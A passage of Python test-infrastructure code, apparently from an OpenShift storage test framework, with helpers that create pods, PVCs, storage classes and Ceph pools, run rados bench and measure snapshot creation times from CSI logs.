del pod_data["spec"]["containers"][0]["volumeMounts"]
pod_data["spec"]["containers"][0]["volumeDevices"] = temp_dict
else:
pod_data["spec"]["containers"][0]["volumeDevices"][0][
"devicePath"
] = raw_block_device
pod_data["spec"]["containers"][0]["volumeDevices"][0]["name"] = (
pod_data.get("spec").get("volumes")[0].get("name")
)
if command:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["command"] = command
else:
pod_data["spec"]["containers"][0]["command"] = command
if command_args:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["args"] = command_args
else:
pod_data["spec"]["containers"][0]["args"] = command_args
if node_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeName"] = node_name
else:
pod_data["spec"]["nodeName"] = node_name
if node_selector:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeSelector"] = node_selector
else:
pod_data["spec"]["nodeSelector"] = node_selector
if sa_name and dc_deployment:
pod_data["spec"]["template"]["spec"]["serviceAccountName"] = sa_name
if subpath:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["volumeMounts"][0][
"subPath"
] = subpath
else:
pod_data["spec"]["containers"][0]["volumeMounts"][0]["subPath"] = subpath
# overwrite used image (required for disconnected installation)
update_container_with_mirrored_image(pod_data)
# configure http[s]_proxy env variable, if required
update_container_with_proxy_env(pod_data)
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind="pod", namespace=namespace)).wait_for_resource(
condition=deploy_pod_status,
resource_name=pod_name + "-1-deploy",
resource_count=0,
timeout=360,
sleep=3,
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get("metadata").get("name")
logger.info(f"Creating new Pod {pod_name} for test")
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create Pod {pod_name}"
return pod_obj
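# Usage sketch (illustrative only): attaching an existing PVC to a new pod and
# waiting for it to run. The PVC name, namespace and status constant below are
# placeholders/assumptions for the example.
#
#   pod_obj = create_pod(
#       interface_type=constants.CEPHBLOCKPOOL,
#       pvc_name="my-test-pvc",
#       namespace="my-test-namespace",
#   )
#   wait_for_resource_state(pod_obj, "Running", timeout=300)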
def create_project(project_name=None):
"""
Create a project
Args:
project_name (str): The name for the new project
Returns:
ocs_ci.ocs.ocp.OCP: Project object
"""
namespace = project_name or create_unique_resource_name("test", "namespace")
project_obj = ocp.OCP(kind="Project", namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(constants.CSI_RBD_SECRET_YAML)
secret_data["stringData"]["userID"] = constants.ADMIN_USER
secret_data["stringData"]["userKey"] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(constants.CSI_CEPHFS_SECRET_YAML)
del secret_data["stringData"]["userID"]
del secret_data["stringData"]["userKey"]
secret_data["stringData"]["adminID"] = constants.ADMIN_USER
secret_data["stringData"]["adminKey"] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data["metadata"]["name"] = create_unique_resource_name(
f"test-{interface}", "secret"
)
secret_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
cbp_name = sc_obj.get().get("parameters").get("pool")
return cbp_name if cbp_name else constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(
pool_name=None, replica=3, compression=None, failure_domain=None, verify=True
):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
replica (int): The replica size for a pool
compression (str): Compression type for a pool
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cbp")
)
cbp_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data["spec"]["replicated"]["size"] = replica
cbp_data["spec"]["failureDomain"] = failure_domain or get_failure_domin()
if compression:
cbp_data["spec"]["compressionMode"] = compression
cbp_data["spec"]["parameters"]["compression_mode"] = compression
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(
cbp_obj.name
), f"Block pool {cbp_obj.name} does not exist"
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cfs")
)
cfs_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(
cfs_data.name
), f"File system {cfs_data.name} does not exist"
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD
base_sc = OCP(kind="storageclass", resource_name=resource_name)
elif interface_type == constants.CEPHFILESYSTEM:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
else:
resource_name = constants.DEFAULT_STORAGECLASS_CEPHFS
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def default_thick_storage_class():
"""
Return default RBD thick storage class
Returns:
OCS: Existing RBD thick StorageClass instance
"""
external = config.DEPLOYMENT["external_mode"]
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD_THICK
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD_THICK
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type,
interface_name,
secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
sc_name=None,
provisioner=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface_type is CephBlockPool
encrypted (bool): True to create encrypted SC else False
encryption_kms_id (str): ID of the KMS entry from connection details
Returns:
OCS: An OCS instance for the storage class
"""
sc_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
sc_data = templating.load_yaml(constants.CSI_RBD_STORAGECLASS_YAML)
sc_data["parameters"]["csi.storage.k8s.io/node-stage-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/node-stage-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.RBD_INTERFACE
sc_data["provisioner"] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
if rbd_thick_provision:
sc_data["parameters"]["thickProvision"] = "true"
if encrypted:
# Avoid circular imports
from ocs_ci.utility.kms import get_encryption_kmsid
sc_data["parameters"]["encrypted"] = "true"
sc_data["parameters"]["encryptionKMSID"] = (
encryption_kms_id if encryption_kms_id else get_encryption_kmsid()[0]
)
elif interface_type == constants.CEPHFILESYSTEM:
sc_data = templating.load_yaml(constants.CSI_CEPHFS_STORAGECLASS_YAML)
sc_data["parameters"]["csi.storage.k8s.io/node-stage-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/node-stage-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.CEPHFS_INTERFACE
sc_data["parameters"]["fsName"] = get_cephfs_name()
sc_data["provisioner"] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data["parameters"]["pool"] = interface_name
sc_data["metadata"]["name"] = (
sc_name
if sc_name
else create_unique_resource_name(f"test-{interface}", "storageclass")
)
sc_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["csi.storage.k8s.io/provisioner-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/provisioner-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"][
"csi.storage.k8s.io/controller-expand-secret-name"
] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/controller-expand-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["clusterID"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["reclaimPolicy"] = reclaim_policy
try:
del sc_data["parameters"]["userid"]
except KeyError:
pass
return create_resource(**sc_data)
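# Usage sketch (illustrative only): the legacy secret -> pool -> storage class
# chain for RBD. These helpers are marked internal above; the flow is shown
# purely for orientation.
#
#   secret_obj = create_secret(constants.CEPHBLOCKPOOL)
#   cbp_obj = create_ceph_block_pool()
#   sc_obj = create_storage_class(
#       constants.CEPHBLOCKPOOL, cbp_obj.name, secret_obj.name
#   )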
def create_pvc(
sc_name,
pvc_name=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None,
do_reload=True,
access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None,
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["name"] = (
pvc_name if pvc_name else create_unique_resource_name("test", "pvc")
)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if volume_mode:
pvc_data["spec"]["volumeMode"] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
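# Usage sketch (illustrative only): creating a PVC from a storage class and
# waiting for it to bind. "my-storageclass" is a placeholder name.
#
#   pvc_obj = create_pvc(sc_name="my-storageclass", size="5Gi")
#   wait_for_resource_state(pvc_obj, "Bound", timeout=120)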
def create_multiple_pvcs(
sc_name,
namespace,
number_of_pvc=1,
size=None,
do_reload=False,
access_mode=constants.ACCESS_MODE_RWO,
burst=False,
):
"""
Create one or more PVCs in bulk or one by one
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True for wait for reloading PVC after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
burst (bool): True for bulk creation, False (default) for one-by-one creation
Returns:
ocs_objs (list): List of PVC objects
tmpdir (str): The full path of the directory in which the yamls for pvc objects creation reside
"""
if not burst:
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
volume_mode = "Block"
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name,
size=size,
namespace=namespace,
do_reload=do_reload,
access_mode=access_mode,
volume_mode=volume_mode,
)
for _ in range(number_of_pvc)
]
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
pvc_data["spec"]["volumeMode"] = "Block"
else:
pvc_data["spec"]["volumeMode"] = None
# Creating a temp directory to hold the yaml files for the PVC creation
tmpdir = tempfile.mkdtemp()
logger.info("Creating the PVC yaml files for creation in bulk")
ocs_objs = []
for _ in range(number_of_pvc):
name = create_unique_resource_name("test", "pvc")
logger.info(f"Adding PVC with name {name}")
pvc_data["metadata"]["name"] = name
templating.dump_data_to_temp_yaml(pvc_data, f"{tmpdir}/{name}.yaml")
ocs_objs.append(pvc.PVC(**pvc_data))
logger.info("Creating all PVCs as bulk")
oc = OCP(kind="pod", namespace=namespace)
cmd = f"create -f {tmpdir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
# Give the system 1 sec per PVC to create; this also prevents any other
# command from running against the cluster during that period of time.
logger.info(
f"Going to sleep for {number_of_pvc} sec. "
"until starting verify that PVCs was created."
)
time.sleep(number_of_pvc)
return ocs_objs, tmpdir
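# Usage sketch (illustrative only): bulk PVC creation followed by bulk deletion
# via delete_bulk_pvcs() below. The storage class and namespace names are
# placeholders; accessing backed_pv on the PVC objects is an assumption about
# the PVC object's API.
#
#   pvc_objs, yaml_dir = create_multiple_pvcs(
#       sc_name="my-storageclass",
#       namespace="my-test-namespace",
#       number_of_pvc=10,
#       size="1Gi",
#       burst=True,
#   )
#   pv_names = [p.backed_pv for p in pvc_objs]
#   delete_bulk_pvcs(yaml_dir, pv_names)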
def delete_bulk_pvcs(pvc_yaml_dir, pv_names_list):
"""
Deletes all the pvcs created from yaml file in a provided dir
Args:
pvc_yaml_dir (str): Directory in which yaml file resides
pv_names_list (str): List of pv objects to be deleted
"""
oc = OCP(kind="pod", namespace=defaults.ROOK_CLUSTER_NAMESPACE)
cmd = f"delete -f {pvc_yaml_dir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
time.sleep(len(pv_names_list) / 2)
for pv_name in pv_names_list:
validate_pv_delete(pv_name)
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exist
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph osd lspools"):
logger.info(f"POOLS are {pools}")
for pool in pools:
if pool_name in pool.get("poolname"):
return True
except TimeoutExpiredError:
return False
def get_pool_cr(pool_name):
"""
Get the pool CR even if the kind is unknown.
Args:
pool_name (str): The name of the pool to get the CR for.
Returns:
dict: The pool CR if the resource is found, None otherwise.
"""
logger.info(f"Checking if pool {pool_name} is kind of {constants.CEPHBLOCKPOOL}")
ocp_kind_cephblockpool = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=config.ENV_DATA["cluster_namespace"]
)
pool_cr = ocp_kind_cephblockpool.get(resource_name=pool_name, dont_raise=True)
if pool_cr is not None:
return pool_cr
else:
logger.info(
f"Pool {pool_name} is not kind={constants.CEPHBLOCKPOOL}"
f", checkging if it is kind={constants.CEPHFILESYSTEM}"
)
ocp_kind_cephfilesystem = ocp.OCP(
kind="CephFilesystem",
namespace=config.ENV_DATA["cluster_namespace"],
)
pool_cr = ocp_kind_cephfilesystem.get(resource_name=pool_name, dont_raise=True)
return pool_cr
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph auth get-key client.admin")
return out["key"]
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph fs ls")
return out[0]["data_pools"][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if the CephFileSystem is present on both the Ceph and OCP
sides, False otherwise (the failure cause is logged)
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get("metadata").get("name"):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info("Filesystem %s was not create at Openshift Side", fs_name)
return False
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph fs ls"):
for out in pools:
result = out.get("name")
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return True if (ceph_validate and ocp_validate) else False
def create_ocs_object_from_kind_and_name(
kind, resource_name, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
):
"""
Create OCS object from kind and name
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
namespace (str): The namespace of the resource.
Returns:
ocs_ci.ocs.resources.ocs.OCS (obj): returns OCS object from kind and name.
"""
ocp_object = OCP(kind=kind, resource_name=resource_name, namespace=namespace).get()
return OCS(**ocp_object)
def remove_ocs_object_from_list(kind, resource_name, object_list):
"""
Given a list of OCS objects, the function removes the object with kind and resource from the list
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
object_list (array): Array of OCS objects.
Returns:
(array): Array of OCS objects without removed object.
"""
for obj in object_list:
if obj.name == resource_name and obj.kind == kind:
object_list.remove(obj)
return object_list
def get_all_storageclass_names():
"""
Function for getting all storageclasses
Returns:
list: list of storageclass names
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result["items"]
storageclass = [
item.get("metadata").get("name")
for item in sample
if (
(item.get("metadata").get("name") not in constants.IGNORE_SC_GP2)
and (item.get("metadata").get("name") not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""" "
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPools
Returns:
list: list of cephblockpool names
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result["items"]
pool_list = [item.get("metadata").get("name") for item in sample]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrieve the CephFS name
Returns:
str: Name of the CephFS
"""
ct_pod = pod.get_ceph_tools_pod()
result = ct_pod.exec_ceph_cmd("ceph fs ls")
return result[0]["name"]
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(node.get_worker_nodes())
for node_obj in node_objs:
logging.info(f'pulling image "{image_name}" on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f"podman pull {image_name}"]
)
def run_io_with_rados_bench(**kw):
"""
A task for radosbench. Runs the radosbench command on the specified pod.
If parameters are not provided, the task assumes a few default parameters.
This task runs the command in synchronous fashion.
Args:
kw (dict): a dictionary of various radosbench parameters.
ex::
pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get("ceph_pods") # list of pod objects of ceph cluster
config = kw.get("config")
role = config.get("role", "client")
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get("idx", 0)
client = clients[idx]
op = config.get("op", "write")
cleanup = ["--no-cleanup", "--cleanup"][config.get("cleanup", True)]
pool = config.get("pool")
block = str(config.get("size", 4 << 20))
time = config.get("time", 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): pv from pvc to validates
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(
pvc_objs, pod_factory, interface, pods_for_rwx=1, status="", nodes=None
):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
nodes (list): Node name for each pod will be selected from this list.
Returns:
list: list of Pod objects
"""
pod_objs = []
nodes_iter = cycle(nodes) if nodes else None
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, "volume_mode", pvc_obj.get()["spec"]["volumeMode"]
)
access_mode = getattr(pvc_obj, "access_mode", pvc_obj.get_pvc_access_mode)
if volume_mode == "Block":
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ""
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [
pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
for _ in range(1, pods_for_rwx)
]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image="quay.io/ocsci/fedora",
source_image_label="latest",
):
"""
Allows creating a build config using a Dockerfile specified as an
argument, eg.::
$ oc new-build -D $'FROM centos:7\\nRUN yum install -y httpd'
creates a build with ``httpd`` installed.
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build docker image from,
defaults to Centos as base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
defaults to 'latest'
install_package (str): package to install over the base image
Returns:
ocs_ci.ocs.ocp.OCP (obj): The OCP object for the image
Raises:
UnavailableBuildException: If the build creation fails
"""
base_image = source_image + ":" + source_image_label
if config.DEPLOYMENT.get("disconnected"):
base_image = mirror_image(image=base_image)
cmd = f"yum install -y {install_package}"
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
cmd = (
f"http_proxy={http_proxy} https_proxy={https_proxy} "
f"no_proxy='{no_proxy}' {cmd}"
)
docker_file = f"FROM {base_image}\n " f" RUN {cmd}\n" f"CMD tail -f /dev/null"
command = f"new-build -D $'{docker_file}' --name={image_name}"
kubeconfig = os.getenv("KUBECONFIG")
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f"Running command {oc_cmd}")
result = run(oc_cmd, stdout=PIPE, stderr=PIPE, timeout=15, shell=True)
if result.stderr.decode():
raise UnavailableBuildException(
f"Build creation failed with error: {result.stderr.decode()}"
)
out = result.stdout.decode()
logger.info(out)
if "Success" in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind="Pod", resource_name=image_name)
if pod_obj.wait_for_resource(
condition="Completed",
resource_name=f"{image_name}" + "-1-build",
timeout=300,
sleep=30,
):
logger.info(f"build {image_name} ready")
set_image_lookup(image_name)
logger.info(f"image {image_name} can now be consumed")
image_stream_obj = OCP(kind="ImageStream", resource_name=image_name)
return image_stream_obj
else:
raise UnavailableBuildException("Build creation failed")
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example::
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind="ImageStream")
command = f"set image-lookup {image_name}"
logger.info(f'image lookup for image"{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_snapshot_time(interface, snap_name, status):
"""
Get the starting/ending creation time of a snapshot based on CSI logs
The time and date extraction code below has been modified to read
the month and day data in the logs. This fixes an error where negative
time values are calculated when test runs cross midnight. Also, previous
calculations would not set the year, and so the calculations were done
as if the year were 1900. This is not a problem except that 1900 was
not a leap year and so the next February 29th would throw ValueErrors
for the whole day. To avoid this problem, changes were made to also
include the current year.
Incorrect times will still be given for tests that cross over from
December 31 to January 1.
Args:
interface (str): The interface backed the PVC
snap_name (str / list): Name of the snapshot(s) for creation time;
if a list is given, it should be a list of snapshot objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of snapshot(s) creation, None if not found
"""
def get_pattern_time(log, snapname, pattern):
"""
Get the time of pattern in the log
Args:
log (list): list of all lines in the log file
snapname (str): the name of the snapshot
pattern (str): the pattern that need to be found in the log (start / bound)
Returns:
str: string of the pattern timestamp in the log, if not found None
"""
this_year = str(datetime.datetime.now().year)
for line in log:
if re.search(snapname, line) and re.search(pattern, line):
mon_day = " ".join(line.split(" ")[0:2])
return f"{this_year} {mon_day}"
return None
logs = ""
# the starting and ending time are taken from different logs,
# the start creation time is taken from the snapshot controller, while
# the end creation time is taken from the csi snapshot driver
if status.lower() == "start":
pattern = "Creating content for snapshot"
# Get the snapshoter-controller pod
pod_name = pod.get_csi_snapshoter_pod()
logs = pod.get_pod_logs(
pod_name, namespace="openshift-cluster-storage-operator"
)
elif status.lower() == "end":
pattern = "readyToUse true"
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
else:
logger.error(f"the status {status} is invalid.")
return None
logs = logs.split("\n")
stat = None
# Extract the time for the one PVC snapshot provisioning
if isinstance(snap_name, str):
stat = get_pattern_time(logs, snap_name, pattern)
# Extract the time for the list of PVCs snapshot provisioning
if isinstance(snap_name, list):
all_stats = []
for snapname in snap_name:
all_stats.append(get_pattern_time(logs, snapname.name, pattern))
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
if stat:
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
else:
return None
def measure_snapshot_creation_time(interface, snap_name, snap_con_name, snap_uid=None):
"""
Measure Snapshot creation time based on logs
Args:
interface (str): The interface that backed the snapshot's source PVC
snap_name (str): Name of the snapshot for creation time measurement
snap_con_name (str): Name of the snapshot content used to find the end time
snap_uid (str): UID of the snapshot, used for the 4.8+ log format
Returns:
float: Creation time for the snapshot in seconds, None if it cannot be determined
"""
start = get_snapshot_time(interface, snap_name, status="start")
end = get_snapshot_time(interface, snap_con_name, status="end")
logs = ""
if start and end:
total = end - start
return total.total_seconds()
else:
# in 4.8 the log messages were changed, so different parsing is needed
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logger.info(f"Read logs from {log_pod}")
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
logs = logs.split("\n")
pattern = "CSI CreateSnapshot: snapshot-"
for line in logs:
if (
re.search(snap_uid, line)
and re.search(pattern, line)
and re.search("readyToUse \\[true\\]", line)
):
# The creation time in the log is in nanoseconds, so it needs to be converted to seconds.
results = int(line.split()[-5].split(":")[1].replace("]", "")) * (
10 ** -9
)
return float(f"{results:.3f}")
return None
def get_provision_time(interface, pvc_name, status="start"):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
